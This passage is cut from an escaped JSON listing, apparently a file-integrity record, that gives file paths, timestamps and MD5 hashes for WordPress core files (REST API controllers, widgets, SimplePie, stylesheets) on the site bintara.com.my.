799830,\"h\":\"8c5ff873dc3098a5e46ccbbf909c377e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/theme-compat\\/embed.php\":{\"d\":1459180468,\"h\":\"72b64c89bf45f2760c6133f7a3dd3649\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/fields\\/class-wp-rest-post-meta-fields.php\":{\"d\":1532017166,\"h\":\"223c389f1da60bde032ef99fa14ba727\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/fields\\/class-wp-rest-user-meta-fields.php\":{\"d\":1532017166,\"h\":\"f0480d050db130a4582f5ee81d1d3052\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/fields\\/class-wp-rest-meta-fields.php\":{\"d\":1539798026,\"h\":\"f2e704dc0db941e1aea32a15cbdd6865\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/fields\\/class-wp-rest-comment-meta-fields.php\":{\"d\":1532017166,\"h\":\"ce5ac6be42d82c1f4a2954f081996378\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/fields\\/class-wp-rest-term-meta-fields.php\":{\"d\":1532017166,\"h\":\"13f907795ef2a5f5b19b909ec1d711a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/search\\/class-wp-rest-post-search-handler.php\":{\"d\":1539786806,\"h\":\"b0709389f92312305994b9c9dd22b9fa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/search\\/class-wp-rest-search-handler.php\":{\"d\":1539786806,\"h\":\"c4397d9d7db1b11346267b4f4acf9ba6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-terms-controller.php\":{\"d\":1539885748,\"h\":\"08db6cf88da324529ff8423a8f35554a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-posts-controller.php\":{\"d\":1541245490,\"h\":\"6a60d74dd83239139aa2bd3dc17c025d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-settings-controller.php\":{\"d\":1508870150,\"h\":\"e99255fbec989b6d5a3c3137a4b6bff2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-blocks-controller.php\":{\"d\":1542801948,\"h\":\"13e11a1d50486effefaf8f7e5c690671\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-post-types-controller.php\":{\"d\":1531455688,\"h\":\"b1df89f9510a2bf0351811ebc4875580\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-taxonomies-controller.php\":{\"d\":1538997628,\"h\":\"5b0baa18c33d060dfc97e4c549b38175\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-block-renderer-controller.php\":{\"d\":1542802488,\"h\":\"6088d0a42989a6911a44a10847bb462a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-comments-controller.php\":{\"d\":1539766226,\"h\":\"a961cc1fd1e5c30ab1b9765f43a6cca1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-users-controller.php\":{\"d\":1539766226,\"h\":\"e659da614034460daa489eaf39e8ca53\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-controller.php\":{\"d\":1542627650,\"h\":\"c6f5375d0e1fdebe3b79be17d6e15c06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-attachments-controller.php\":{\"d\":1545267178,\"h\":\"c31355d40ad0d67a60cf44ac77b26fd7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-revisions-controller.php\":{\"d\":1539233206,\"h\":\"f79906d418c741d242f8bed41d477d5b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-post-statuses-controller.php\":{\"d\":1539885386,\"h\":\"8444e8a7ba40697b12829c8b8958c01c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-autosaves-controller.php\":{\"d\":1542277672,\"h\":\"9b0c3f72a764f63edd6442f5c597f44b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-themes-controller.php\":{\"d\":1540265900,\"h\":\"b6d706abf716429f47ee39b711591156\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/endpoints\\/class-wp-rest-search-controller.php\":{\"d\":1539805826,\"h\":\"c4dbe064b3875f65ec0b5e4c7e79b001\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/class-wp-rest-server.php\":{\"d\":1514657980,\"h\":\"b50a28c1c5e1fbc89e516555ea32fc99\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/class-wp-rest-response.php\":{\"d\":1501107104,\"h\":\"2780a8918cca18e0e9e019b452ce3169\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/rest-api\\/class-wp-rest-request.php\":{\"d\":1501417364,\"h\":\"2d72b1269970f9e07c2de2dddac77bf2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-pages.php\":{\"d\":1508094828,\"h\":\"8ebb338e15a5f1a2a2ae9ec21dcd1c73\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-meta.php\":{\"d\":1508094828,\"h\":\"059bd0fcfe1b7bda11e79976e1c84465\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-text.php\":{\"d\":1517315202,\"h\":\"89b44ed0a8562d2626140d41cbac1fd8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-archives.php\":{\"d\":1508094828,\"h\":\"b73f7fed732ef178344d335b1b2ec6a9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-media-video.php\":{\"d\":1508362674,\"h\":\"38e269e7c496ee65c39fb5086ac8a9b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-recent-posts.php\":{\"d\":1508277886,\"h\":\"76b598ae8580aa03a80a6a715589585d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-media-image.php\":{\"d\":1516587824,\"h\":\"619179c7e3e00e8a873e07e347c1212b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-calendar.php\":{\"d\":1508094828,\"h\":\"e0a81deadf7e5c52fee651410dff9f86\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-nav-menu-widget.php\":{\"d\":1508097228,\"h\":\"ff7aa786c75ed03355cfc7f7fc64498f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-search.php\":{\"d\":1508094828,\"h\":\"a3e28aa035e37faf6536140564a929c9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-links.php\":{\"d\":1506972768,\"h\":\"a62c1c6a35b50e475f626fa52dc41821\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-recent-comments.php\":{\"d\":1506972768,\"h\":\"6f8e23f590c4d32d2eee2b53c70d5924\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-rss.php\":{\"d\":1508094828,\"h\":\"8e880fc45940a0c6c23e5005af2af01c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-custom-html.php\":{\"d\":1510704224,\"h\":\"92e495da427af67d45420a6d1ee60ae5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-media-audio.php\":{\"d\":1506676368,\"h\":\"fdfd85dc7c9c9d0f037ae789dd9a24a8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-tag-cloud.php\":{\"d\":1508094828,\"h\":\"37fb7946b672ce58ce19aacff58f8efa\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-categories.php\":{\"d\":1508094828,\"h\":\"435a4a04f4dca031c14b9f38a3c9c373\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-media.php\":{\"d\":1508447688,\"h\":\"d91920c0386e48744104bf86e1d863c4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/widgets\\/class-wp-widget-media-gallery.php\":{\"d\":1508447688,\"h\":\"05dd32417c2270fe96b319770d25471b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Net\\/IPv6.php\":{\"d\":1353528116,\"h\":\"a546790e216abdd9801795949fb6b40f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Decode\\/HTML\\/Entities.php\":{\"d\":1353528116,\"h\":\"45975e2fcf0d428691a55a2394252f61\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/XML\\/Declaration\\/Parser.php\":{\"d\":1353528116,\"h\":\"8fb1da7028c385bb9d4203c9f6732362\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Content\\/Type\\/Sniffer.php\":{\"d\":1353528116,\"h\":\"7c72c3f369855562d96c77ece1c7db33\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/HTTP\\/Parser.php\":{\"d\":1353528116,\"h\":\"5725c7d0fb347f1c08df3690a58f3609\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Parse\\/Date.php\":{\"d\":1445311644,\"h\":\"ee82d2e70dc8afc6b96510d2b9cff45e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache\\/DB.php\":{\"d\":1353528116,\"h\":\"0659bf084f55a303f5922edc62bcfbf6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache\\/Base.php\":{\"d\":1353528116,\"h\":\"9443eda189bbd9325d0c9c045d237c6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache\\/Memcache.php\":{\"d\":1353528116,\"h\":\"f69d4a55b2a1168531535107ab843fb6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache\\/File.php\":{\"d\":1353528116,\"h\":\"a33dbb0540ecc29cc6425b14100953d1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache\\/MySQL.php\":{\"d\":1353528116,\"h\":\"e8911ece15df42ca43991a48d5785687\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/gzdecode.php\":{\"d\":1353528116,\"h\":\"c538e2bc0e866197db616c17841134d4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Misc.php\":{\"d\":1373294416,\"h\":\"cecde679c62dd50207d8d25ece1a4b89\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Sanitize.php\":{\"d\":1378863130,\"h\":\"42d8b8c0cf46b5d8a511e0ae48b88f75\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/IRI.php\":{\"d\":1353528116,\"h\":\"6e16ff20d3e68692cf3b617b875f36f5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Registry.php\":{\"d\":1353528116,\"h\":\"1cc8a2e6c0b5dd3176398d6400f0d9b8\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Category.php\":{\"d\":1353528116,\"h\":\"ba7ec8cc3f13d4f27f2e0adcaf64bb2a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Enclosure.php\":{\"d\":1353528116,\"h\":\"122e861f42eb6e01ce8d4b0f11fb735d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Core.php\":{\"d\":1353528116,\"h\":\"a4ae19a923b890f2dcf7e2d415fd1ad2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Copyright.php\":{\"d\":1353528116,\"h\":\"bd7fbf68b954a9d50955cc808db7cb6a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Parser.php\":{\"d\":1353528116,\"h\":\"52bb2ee462e7e414a77efdc7ebf52bcc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Exception.php\":{\"d\":1352393094,\"h\":\"094bfd76269c9fcc3c5cda8f05d05335\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Author.php\":{\"d\":1353528116,\"h\":\"348071ed105ff0418b25964e771ba331\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Cache.php\":{\"d\":1353528116,\"h\":\"79fc9017a23a836f4d0f68f7764ca734\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/File.php\":{\"d\":1353528116,\"h\":\"aeba08ad6b558736ea0aaf2beb2925b7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Caption.php\":{\"d\":1353528116,\"h\":\"bdbabcdcca426a4dadf6675bc4c4ebe9\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Restriction.php\":{\"d\":1353528116,\"h\":\"2a191e7168116418817388113bd57914\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Item.php\":{\"d\":1353528116,\"h\":\"104510e221fa08437aec008e633cdca7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Source.php\":{\"d\":1353528116,\"h\":\"8e83bb1de3e018f0537bb32a8c9617ff\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Rating.php\":{\"d\":1353528116,\"h\":\"3d7013a46d09c74b0ee3d8af617412fb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Credit.php\":{\"d\":1353528116,\"h\":\"0385e4a14de78c8b2a167f3e0aea197c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/SimplePie\\/Locator.php\":{\"d\":1353528116,\"h\":\"8073a4c6da1bb33b877576665ef5eab5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/editor-styles.css\":{\"d\":1542847906,\"h\":\"47ef28d2a0a9d167122d09934271de03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/editor-styles-rtl.min.css\":{\"d\":1542847906,\"h\":\"6d86ff0ca33033ac9a036e21f0b0ea9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/editor-styles.min.css\":{\"d\":1542847906,\"h\":\"6d86ff0ca33033ac9a036e21f0b0ea9e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/style.css\":{\"d\":1547081519,\"h\":\"59d50c0db9d21f6a092e347714520c01\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/editor-styles-rtl.css\":{\"d\":1542847906,\"h\":\"47ef28d2a0a9d167122d09934271de03\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/style-rtl.min.css\":{\"d\":1547081519,\"h\":\"ab6108c21a2a1d14df1dc9f0d49827d7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/style-rtl.css\":{\"d\":1547081519,\"h\":\"54a9556e4830fb69925ad216617c5aad\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/editor\\/style.min.css\":{\"d\":1547081519,\"h\":\"c16f103ecb87682ba3b40546bd0568ed\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/theme-rtl.css\":{\"d\":1542847906,\"h\":\"c05ede63e9bfee178e4307ae1b6d6075\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/editor-rtl.css\":{\"d\":1545267178,\"h\":\"5e813d95a85d8ea28d0a49ee1d043803\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/theme-rtl.min.css\":{\"d\":1542847906,\"h\":\"6d0ba66f6e7fcfdcba9bdaeb1dcad3c0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/theme.css\":{\"d\":1542847906,\"h\":\"48943d583062427bd919c60005f397b3\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/style.css\":{\"d\":1547081519,\"h\":\"b57c9841759fb679653e42162a9218c7\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/theme.min.css\":{\"d\":1542847906,\"h\":\"bfa7dc8c1c5e86d37ba25252afe3602e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/editor-rtl.min.css\":{\"d\":1545267178,\"h\":\"6e977885a56d7fb205284b679d545717\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/editor.css\":{\"d\":1545267178,\"h\":\"25209d7f4c896e298c193b79ec105d5d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/style-rtl.min.css\":{\"d\":1547081519,\"h\":\"d853d590816c08875d95849875e42648\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/style-rtl.css\":{\"d\":1547081519,\"h\":\"76adcd3fae217c56e6fc3ff97257a3b4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/style.min.css\":{\"d\":1547081519,\"h\":\"eb1a96949e0ea0d08033d3f941bf1f3e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/block-library\\/editor.min.css\":{\"d\":1545267178,\"h\":\"d6824fcfdbd1dd2cae2ecd53818838da\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/nux\\/style.css\":{\"d\":1542847906,\"h\":\"51e91a4aa751cd486eb1c5f4a90186f6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/nux\\/style-rtl.min.css\":{\"d\":1542847906,\"h\":\"00c7a8bf8a43b2a6342ae12d8014b357\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/nux\\/style-rtl.css\":{\"d\":1542847906,\"h\":\"9a5451d5e895048dffe2507330037cca\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/nux\\/style.min.css\":{\"d\":1542847906,\"h\":\"2988ea994f3223b637ed87efb015941a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/edit-post\\/style.css\":{\"d\":1545267178,\"h\":\"7d8068d9ae8977783cd06a11929f3b56\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/edit-post\\/style-rtl.min.css\":{\"d\":1545267178,\"h\":\"86922662b6c4570d6536929cc8a014cb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/edit-post\\/style-rtl.css\":{\"d\":1545267178,\"h\":\"a9da3ceda6dfce34b69fe1bc3b1f5ee6\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/edit-post\\/style.min.css\":{\"d\":1545267178,\"h\":\"bcfded1af21db1cdd0d49f32ddd77745\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/list-reusable-blocks\\/style.css\":{\"d\":1542847906,\"h\":\"690c76f64d35502bc7e4c367bb4efea4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/list-reusable-blocks\\/style-rtl.min.css\":{\"d\":1542318830,\"h\":\"665ee57d23f6e1b6539fd1b0e62d31ab\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/list-reusable-blocks\\/style-rtl.css\":{\"d\":1542847906,\"h\":\"d3835cf3e87d8764e8c9ba8e470af641\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/list-reusable-blocks\\/style.min.css\":{\"d\":1542318830,\"h\":\"720f7773fc0b0a8d79d4f3fc89658c1e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/format-library\\/style.css\":{\"d\":1542847906,\"h\":\"11c31e9d289b83b5e77d72bac6727f8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/format-library\\/style-rtl.min.css\":{\"d\":1542318830,\"h\":\"0e7d5e83a110cada2dcbb79e0ebb5cf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/format-library\\/style-rtl.css\":{\"d\":1542847906,\"h\":\"11c31e9d289b83b5e77d72bac6727f8a\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/format-library\\/style.min.css\":{\"d\":1542318830,\"h\":\"0e7d5e83a110cada2dcbb79e0ebb5cf5\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/components\\/style.css\":{\"d\":1547081519,\"h\":\"ceaf3c35802604ba2964561a5c15cafd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/components\\/style-rtl.min.css\":{\"d\":1547081519,\"h\":\"c1b549e7ed316bf5a1d38d545923230e\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/components\\/style-rtl.css\":{\"d\":1547081519,\"h\":\"23207926b6554158a37d95234a23414f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dist\\/components\\/style.min.css\":{\"d\":1547081519,\"h\":\"50242e6ba592897625683280e2cc183d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/media-views-rtl.min.css\":{\"d\":1540175680,\"h\":\"cfa39e76d5951ec19fb374fcc68722a4\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/customize-preview-rtl.min.css\":{\"d\":1540175680,\"h\":\"26b12a98fb6b6e4b9791e35fa9df232b\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/admin-bar-rtl.min.css\":{\"d\":1539044566,\"h\":\"7c80f6ab4c6fd0d3f4c5391a2e635780\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-pointer-rtl.min.css\":{\"d\":1539044566,\"h\":\"a35fbcb6a0ef77a051a7415a11eb6027\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/customize-preview-rtl.css\":{\"d\":1540175680,\"h\":\"f6c1fb0448444810959c4c9b94ef2cb0\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dashicons.css\":{\"d\":1500158746,\"h\":\"5d6b5071186dbd3e8af754f6a013ba18\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/jquery-ui-dialog-rtl.css\":{\"d\":1540175680,\"h\":\"61d8a3d3a6d658c14b3af6df9867c814\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/jquery-ui-dialog-rtl.min.css\":{\"d\":1540175680,\"h\":\"0d69bfe5e1fbf61a192084e6f5acd344\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/dashicons.min.css\":{\"d\":1503164448,\"h\":\"1c364e777cd2b874ea6cf09100861c6c\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/buttons.css\":{\"d\":1540175680,\"h\":\"87ba05ef0da13f82c90d2e6cff2be01f\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/editor-rtl.css\":{\"d\":1542009950,\"h\":\"5d6f193d1f5c5adc2323941754c753bc\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/admin-bar.min.css\":{\"d\":1539044566,\"h\":\"3b3696d5be809c1ae294cd0c1149431d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/buttons-rtl.min.css\":{\"d\":1540175680,\"h\":\"92314c04b1ab4f91ce18aced65f218f2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/customize-preview.min.css\":{\"d\":1540175680,\"h\":\"82273ee41dee175c7defaaadad83da06\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/media-views.css\":{\"d\":1540175680,\"h\":\"4812195c34e86b684243abbc1d8d1798\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-auth-check-rtl.min.css\":{\"d\":1540175680,\"h\":\"ff073acb3f9177edfdcd35dfcd63fd71\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-auth-check.min.css\":{\"d\":1540175680,\"h\":\"a25e23b0eceedaebe5046299e1b2b7a2\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-embed-template.css\":{\"d\":1540175680,\"h\":\"97969382af4adc0bd1376c79a17aadc1\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-pointer.css\":{\"d\":1526297426,\"h\":\"8b0b4f07ee0da51fb5b48944e20b4c11\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/buttons-rtl.css\":{\"d\":1540175680,\"h\":\"2f8b834d9d91275dbd682e1ea4dd38cd\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/admin-bar.css\":{\"d\":1506707030,\"h\":\"9ea3eba803004cf0fd6fa54f113fc2eb\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-embed-template-ie.css\":{\"d\":1446257306,\"h\":\"eeb729369ef309d89ed0bc7120aacadf\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/wp-embed-template.min.css\":{\"d\":1540175680,\"h\":\"5ea02d6d347946e4d2344e336da3cf8d\"},\"\\/home\\/norfaiz\\/public_html\\/bintara.com.my\\/wp-includes\\/css\\/editor-rtl.min.css\":{\"d\":1542009950,\"h\":\"98bb07383e45aa479177ad8b6e7f49e4\"},\"\\/home\\/